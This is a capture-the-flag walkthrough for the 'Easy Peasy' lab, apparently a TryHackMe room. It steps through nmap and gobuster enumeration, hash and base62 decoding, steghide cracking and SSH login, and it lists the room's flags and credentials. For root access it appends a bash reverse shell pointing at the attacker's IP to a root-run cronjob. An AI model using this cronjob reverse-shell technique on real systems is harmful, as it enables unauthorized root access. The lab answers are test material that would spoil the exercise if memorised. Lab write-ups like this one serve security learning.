EASYPEASY

Run nmap scan for port and service scanning

Nmap -p- 10.10.8.182

Nmap -sCV 10.10.8.182

 

Hit on the web browser with the highest port , and got the service is Apache

 

 

 

 

THM questions: Enumeration through Nmap

Download the given file and sort it

 

 

 

 

 

 

 

For Question 1:

Using gobuster to find out the directory List

 

Using gobuster to find out the directory under the hidden directory

 

View the page source of recently found page and using cyberchef to find out the flag 1

 Flag 1: flag{f1rs7_fl4g}

 

 

 

 

For question 2:

Visit http://10.10.132.149:65524/robots.txt and found a hash value

a18672860d0510e5ab6699730763b250

Now go to this site https://md5hashing.net/ dycrypt the hash value

flag{1m_s3c0nd_fl4g}

For question 3:

On the 10.10.132.149:65524 page view source found the flag 3

Flag 3: lag{9fdafbd64c47471a8f54cd3fc64cd312}
 

 

For question 4:

On the 10.10.132.149:65524 page view source found the hidden tag and a hash starting with ba…..

Here mention ba.. value so we try all base decoder. Using cyberchef we can crack the base62 value

10.10.132.149:65524/n0th1ng3ls3m4tt3r

 

 

 

 

 

For question 5:

View source of  10.10.132.149:65524/n0th1ng3ls3m4tt3r/  and get a hash value

940d71e8655ac41efb5f8ab850668505b86dd64186a66e57d1483e7f5fe6fd81

Using john tool try to crack the password

 

For Question 6:

View source of  10.10.132.149:65524/n0th1ng3ls3m4tt3r/  and Download the image

Try to get information about the image by steghide tool but need a passphrease

Crack the image by stegcracer tool using the given password file,

and get the extract information in to file called easypeasy.jpeg.out

Convert it from binary to decimal

 

 

Try to connect via SSH with port 6498

Username: boring

Password: iconvertedmypasswordtobinary

 

 

For Question 7:

Found a file called user.txt but cant get the flag , It seems the encrypted. There is a hinted mentioning Rotated.

 

 

 

 

 

Decoded it with cyberchef   root13 decoder  flag{n0wits33msn0rm4l}

For Qustion 8:

As mention on the room task there must be a cronjob running

Found a cronjob is running  named .mysecrectcronjob.sh

Open this file with editor and add this line for access a reverse shell.

bash -i >& /dev/tcp/10.10.8.87/4444 0>&1

Run listening port on my local machine and access that machine as root user

 

Then fond the hidden file .root.txt at the root user home directory and there found the last flag

flag{63a9f0ea7bb98050796b649e85481845}